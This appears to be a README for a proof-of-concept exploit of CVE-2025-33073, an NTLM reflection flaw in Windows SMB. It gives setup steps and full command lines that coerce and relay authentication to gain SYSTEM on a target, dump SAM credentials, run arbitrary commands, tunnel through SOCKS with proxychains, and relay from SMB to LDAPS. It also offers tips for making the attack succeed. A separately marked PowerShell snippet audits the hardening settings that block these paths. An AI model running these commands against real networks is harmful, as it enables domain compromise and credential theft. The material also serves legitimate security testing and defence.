PoC Exploit for the NTLM reflection SMB flaw.
All credits go to the official research:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (has most packages pre-installed).
- NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
- impacket-ntlmrelayx
- dnstool.py (included in repo)
The tool will automatically use a virtual environment. To set it up, run:
./setup.sh

This will create a virtual environment and install all required dependencies, including ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Custom command
Instead of running secretsdump, a custom command can be executed.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"
SOCKS
For stealthier execution of commands once a valid connection as SYSTEM has been established. --target and --target-ip must be the same value here.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
A custom command can also be run through proxychains instead of dumping the SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
Research was performed to check whether the reflection really does not work with SMB signing enabled. This resulted in finding bugs where, if SIGN/SEAL are removed from the packet, it is possible to relay from SMB to LDAPS, which is usually not possible because of the MIC.
Thanks to:
- https://github.com/decoder-it/impacket-partial-mic/
- https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
- https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
If you're in the same broadcast domain as the device and it's vulnerable to LLMNR poisoning, it's possible to exploit it without having to register a DNS record.
- I've seen the attack not work sometimes because the hostname is used for the attack, which results in a DNS lookup from Kali. If Kali is not using the DNS server, or you get a '/ FAILED' message from impacket-ntlmrelayx, try adding the host to your /etc/hosts file. This should result in the attack working.
- If using an IP, the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of a failure. It's not yet perfectly clear why this happens. I think it has something to do with networking.
- Try another coerce method using -M or --method.
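A defender-side check of the preconditions this README relies on (SMB signing not required, LLMNR enabled, LDAP signing and LDAPS channel binding not enforced). This is an added example, not part of the PoC; it uses standard Windows cmdlets and registry paths, and the LDAP values are only meaningful when run on a domain controller.

```powershell
# Added example (not part of the PoC): audit the settings that close the
# attack paths described above. Run in an elevated PowerShell on the host.

# SMB signing: both server and client side should require signatures.
$srvSigning = (Get-SmbServerConfiguration).RequireSecuritySignature
$cliSigning = (Get-SmbClientConfiguration).RequireSecuritySignature

# LLMNR: EnableMulticast = 0 under the DNSClient policy key disables it.
$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast `
          -ErrorAction SilentlyContinue).EnableMulticast
$llmnrDisabled = ($llmnr -eq 0)

# LDAP (domain controllers only): LDAPServerIntegrity 2 = require signing,
# LdapEnforceChannelBinding 2 = always require channel binding on LDAPS.
$ntdsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$ntds = Get-ItemProperty -Path $ntdsKey -ErrorAction SilentlyContinue
$ldapSigningRequired = ($ntds.LDAPServerIntegrity -eq 2)
$ldapsCbtRequired    = ($ntds.LdapEnforceChannelBinding -eq 2)

[pscustomobject]@{
    SmbServerSigningRequired = $srvSigning
    SmbClientSigningRequired = $cliSigning
    LlmnrDisabled            = $llmnrDisabled
    LdapSigningRequired      = $ldapSigningRequired   # DC only
    LdapsChannelBindingAlways = $ldapsCbtRequired    # DC only
}
```

Any False in the output is a setting worth reviewing; on a non-DC the two LDAP fields will simply read False because the NTDS key is absent.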
[Screenshot: Local NTLM authentication takes place]

[Screenshot: Local NTLM authentication does not take place, resulting in a FAILED attempt]

- The DNS record should also be known to the client, which can take more time on some occasions. By more time I mean give it a couple of minutes.
- This is just a PoC, which means no AV/EDR bypasses have been attempted. Use at your own risk.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073